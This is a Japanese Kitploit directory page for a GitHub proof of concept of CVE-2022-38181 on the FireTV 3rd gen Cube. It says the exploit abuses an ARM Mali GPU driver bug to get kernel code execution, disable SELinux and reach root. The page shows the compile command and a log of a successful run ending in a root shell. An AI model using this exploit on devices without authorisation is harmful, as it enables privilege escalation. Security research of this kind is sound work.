Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE_2022_38181_Gazelle — CVE-2022-38181 POC for FireTV 3rd gen Cube (gazelle) | Kitploit
ツール/GitHubGitHub/pro-me3us/cve_2022_38181_gazelle
Androidセキュリティ組み込みシステムセキュリティ特権昇格エクスプロイトハードウェアセキュリティバイナリエクスプロイト
GitHubpro-me3us/cve_2022_38181_gazelle

CVE_2022_38181_Gazelle

CVE-2022-38181 POC for FireTV 3rd gen Cube (gazelle)

リポジトリを見る
333年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

FireTV 第3世代Cube 上で動作する CVE-2022-38181 のエクスプロイト

これは、セキュリティ研究者 Man Yue Mo 氏の CVE_2022_38181 用の Pixel 6 POC のフォークです。詳細な脆弱性解説は こちら をご覧ください。FireOS の32ビットユーザースペースに対応するための変更が加えられています。このPOCは、ARM Mali カーネルドライバのバグを悪用してカーネルコードの任意実行を実現し、SELinuxを無効化してrootを取得します。

ndk-21 の clang を使用してコンパイルするには以下のコマンドを使用しました:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o gazelle_shrinker

エクスプロイトは、Cube起動後30〜90秒以内に実行すると最も高い信頼性が得られます。

root@kitploit:~
gazelle:/ $ /data/local/tmp/gazelle_shrinker
fingerprint: Amazon/gazelle/gazelle:9/PS7613.3701N/0025401652480:user/amz-p,release-keys
failed, retry.
failed, retry.
region freed 47
alias gpu va 100c83000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 6 0
Found freed_idx 6
Found pgd 23, 100d30000
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
gazelle:/ # 
ツールをダウンロード